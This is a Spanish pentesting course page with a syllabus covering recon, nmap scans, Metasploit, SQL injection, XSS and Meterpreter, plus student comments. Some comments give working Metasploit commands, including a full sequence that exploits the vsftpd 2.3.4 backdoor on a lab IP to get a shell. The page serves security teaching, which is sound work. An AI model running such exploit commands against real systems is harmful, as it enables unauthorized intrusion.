Bienvenida y presentación general
Introducción y pasos para aprender sobre pentesting
¿Qué es Pentesting?
Modelo de trabajo PTES
Instalación y configuración de máquinas virtuales para laboratorios
Conceptos generales de redes
Modelo TCP/IP
Enrutamiento
Configuración de una máquina virtual como enrutador
Clonación de la máquina para tener un segundo enrutador
Tablas de enrutamiento y configuración de rutas
Configuración completa del entorno de red
Etapa I: Recopilación de información
Whois
Netcraft
HTTrack
Recon-NG
Escaneo y análisis de vulnerabilidades
Análisis de protocolos TCP y UDP
Escaneo por barrido de IPs y de puertos
Análisis de TCP con Wireshark
Barrido de IPs con nmap
Escaneo XMAS
Escaneo NULL
NMAP Scripting
Análisis de vulnerabilidades con OpenVAS
Explotación
Análisis de servicios web
Explotación de vulnerabilidades con Metasploit
Arquitectura de Metasploit
Ataques con Armitage
Spidering web
Ataques de inyección de código para obtener información de usuarios y nombre de la base de datos
Ataques de inyección de código para obtener información de los usuarios del sistema
Ataques XSS
Post-Explotación
Creación del archivo malicioso y configuración de Meterpreter
Acceso desde Windows a la máquina de Kali
Estructura de un reporte y cómo aprender más de Pentesting
Aún no tienes acceso a esta clase
Crea una cuenta y continúa viendo este curso
Metasploit es un framework para desarrollo y prueba de exploits que aprovecha diferentes vulnerabilidades. Utiliza una gran base de datos donde encuentras payloads y exploits que puedes usar dependiendo de las debilidades encontradas.
Aportes 11
Preguntas 1
Comandos:
service postgresql startmsfconsolesearch nombreexploitset RHOST IPrunPara los que les salga este problemita
Exploit completed, but no session was created.
yo intenté con poner el payload correspondiente
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.20.34
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
Y funcionó
me parece necesaria una actualizacion del curso, ya lleva mas de dos años, seria bueno que lo actualizaran
Wow! mi primer Hack! Exploit successful! shell found! 👩🚀
yo tuve un problema de que no podia leer un archivo --bundler/ setup; Aqui les dejo la solucion
sudo gem update --system
sudo gem install bundler:1.17.3
continuan con
cd /usr/share/metasploit-framework
sudo bundle install
por ultimo damos el comando #msfconsole
actualicen el curso…hay comandos que se han modificado
Buenos díás, tengo una duda y queria saber quien me puede ayudar. No entiendo la diferencia de ejecutar el exploit con la palabra “run” y la palabra “exploit”, lo pregunto porque tenia entendido que el “run” se usa para ejecutar un “auxiliary”
Metasploit – software (framework) que sirve para ejecutar exploits aprovenchando diferentes vulnerabilidades.
Exploit – software que sirve para usar contra S.O. software o protocolo para poderlo usar de forma para la que no fue programada.
Y si no logramos tener un Shell, que hacemos?
¿Quieres ver más aportes, preguntas y respuestas de la comunidad? Crea una cuenta o inicia sesión.